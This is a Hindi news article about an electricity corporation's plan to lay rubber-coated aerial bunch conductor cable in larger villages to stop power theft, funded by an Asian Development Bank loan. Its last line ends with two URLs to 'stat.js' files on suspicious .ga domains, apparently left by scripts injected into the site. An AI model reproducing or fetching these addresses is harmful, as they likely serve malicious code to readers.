बिजली चोरी को रोकने के लिए बिजली निगम द्वारा एक बड़ी पहल की जा रही है। जिससे बिजली की चोरी को आसानी से रोका जा सकता है। जिन गांवो की आबादी की एक हजार से ज्यादा होगी अब उस गावों में एरियल बंच कंडक्टर(एबीसी ) से बिजली की आपूर्ति की जाएगी। एरियल बंच लगने के बाद जो लोग कटिया लगाकर बिजली चोरी कर रहे थे। उनलोगो को पूरी तरह से रोका लगाया जा सकता है।

 

 

एबीसी एक विशेष तरीके का तार है।इसपर रबड़ की मोटी परत लगी होती है जिसे काटकर कटिया लगाना संभव नहीं हैबिजली निगम के द्वारा सबसे ज्यादा जोर लाइनलॉस पे है प्रयास है की लाइन लॉस को 15 फीसद से कम ले आना है ऊर्जा मंत्री के आदेश पर निगम के अफसर सबसे ज्यादा लाइन लॉस वाले फीडर क्षेत्रो में जांच अभियान चलाया जा रहा है जाँच के दौरान बहुत से गांवो में कटिया डालकर जो लोग बिजली चोरी कर रहे थे वो लोग पकड़े भी गए है

 

 

एबीसी बिछाने के लिए निगम द्वारा एशियन विकास बैंक से लोन लेना पड़ रहा है एबीसी बिछाने में लगभग 90 करोड रुपए खर्च होंगे। 15 नवंबर तक बैंक और बिजली निगम के अफसरों के बीच बातचीत के बाद काम शुरू होने की उम्मीद है ऋण लेने की प्रक्रिया पूरी की जा चुकी है जिले में एक हजार से ज्यादा वाले गांव 992 है वही 16 से नवंबर से एबीसी बिछाना शुरू हो जायेगा और 18 महीनों में एरियल बंच कंडक्टर बिछानी है

 

 

 

जिले में 88 फ़ीसदी तक 10 से ज्यादा गांवों में लाइनलास पहुंच चुका है इन गांवो में न सिर्फ बिजली चोरी हो रही है बल्कि बकायदार रुपए भी नहीं जमा कर रहे हैं और में 1000 से ज्यादा आबादी वाले गांव- 992 हैhttps://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.